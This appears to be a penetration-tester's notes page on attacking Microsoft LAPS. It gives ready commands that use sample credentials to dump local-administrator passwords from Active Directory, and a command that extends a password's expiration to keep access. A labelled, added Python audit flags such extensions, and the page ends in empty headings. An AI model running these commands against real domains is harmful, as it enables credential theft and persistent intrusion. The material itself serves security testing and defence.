05.06.2024 · dadevel

Local Administrator Password Solution (LAPS) assigns random passwords to the local administrator account on domain-joined devices (source). With LAPSv1 the password is stored in the ms-MCS-AdmPwd attribute on the computer object. With LAPSv2 the msLAPS-EncryptedPassword or msLAPS-Password attribute is used.

Check if the current computer has LAPSv1 installed.

dir "C:\Program Files\LAPS\CSE\AdmPwd.dll"

Get LAPS username from registry by reading HKLM\Software\Policies\Microsoft Services\AdmPwd\AdminAccountName.

Get LAPS username from GPO (source).

PS > Get-DomainGPO | ? { $_.DisplayName -like '*laps*' } | select DisplayName, Name, GPCFileSysPath
PS > cp \\dc01.corp.local\SysVol\corp.local\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol .
PS > Parse-PolFile .\Registry.pol
KeyName     : Software\Policies\Microsoft Services\AdmPwd
ValueName   : AdminAccountName
ValueType   : REG_SZ
ValueLength : 20
ValueData   : LapsAdmin

Dump all accessible LAPS passwords.

Requires PR 1673.

impacket-readlaps corp.local/jdoe:'passw0rd'
python3 ./ -debug -computer ws01 corp.local/jdoe:'passw0rd'
netexec ldap dc01.corp.local -d corp.local -u jdoe -p 'passw0rd' -M laps
ldapsearch -o ldif-wrap=no -H ldaps://dc01.corp.local -D [email protected] -w 'passw0rd' -b dc=corp,dc=local '(&(objectCategory=computer)(ms-MCS-AdmPwd=*))'
Get-ADComputer -Server dc01.corp.local -Identity ws01 -Properties ms-MCS-AdmPwd,ms-Mcs-AdmPwdExpirationTime
Get-ADObject -LdapFilter '(ms-MCS-AdmPwd=*)' -Properties ms-MCS-AdmPwd,ms-Mcs-AdmPwdExpirationTime | %{ $_.DistinguishedName, $_['ms-MCS-AdmPwd'] }

If the policy "Do not allow password expiration time longer than required by policy" (PwdExpirationProtectionEnabled) is not enabled and you control a computer, you can set the expiration of the LAPS password far into the future (source).

Set-DomainObject -Identity ws01 -Set @{'ms-Mcs-AdmPwdExpirationTime'='136257686710000000'} -Verbose
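
The value written to ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME (100-nanosecond intervals since 1601-01-01 UTC). As an added example, not part of the original page, this Python audit decodes the attribute and flags computers whose expiration lies beyond the policy's password age. The 30-day maximum age, the function names and all sample records except the ws01 value are assumptions.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(value):
    """Convert a FILETIME (int or decimal string, as LDAP returns it) to UTC."""
    ticks = int(value)
    # Integer arithmetic only: floats lose precision at this magnitude.
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def find_extended_expirations(records, now, max_age_days=30):
    """Return (computer, expiry) pairs whose expiry lies beyond now + max_age_days.

    records: iterable of (computer name, ms-Mcs-AdmPwdExpirationTime value).
    max_age_days: assumed value of the LAPS password age policy.
    """
    limit = now + timedelta(days=max_age_days)
    findings = []
    for name, raw in records:
        if not raw:
            continue  # attribute not set or not readable for this computer
        expiry = filetime_to_datetime(raw)
        if expiry > limit:
            findings.append((name, expiry))
    return findings


# Constructed sample data; only the ws01 value appears on this page.
SAMPLE_NOW = datetime(2024, 6, 5, tzinfo=timezone.utc)
SAMPLE_RECORDS = [
    ("ws01", "136257686710000000"),  # decodes to 2032-10-13 15:44:31 UTC
    ("ws02", "133633152000000000"),  # constructed: 2024-06-20, inside the window
    ("ws03", None),                  # constructed: no value returned
]

if __name__ == "__main__":
    for name, expiry in find_extended_expirations(SAMPLE_RECORDS, SAMPLE_NOW):
        print(f"{name}: expires {expiry.isoformat()} (beyond policy window)")
```

Feed it the name and attribute pairs returned by any of the LDAP queries above; a hit means the next automatic rotation is further away than policy allows.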

The timestamp can be calculated with

Other tools:

Untested tools: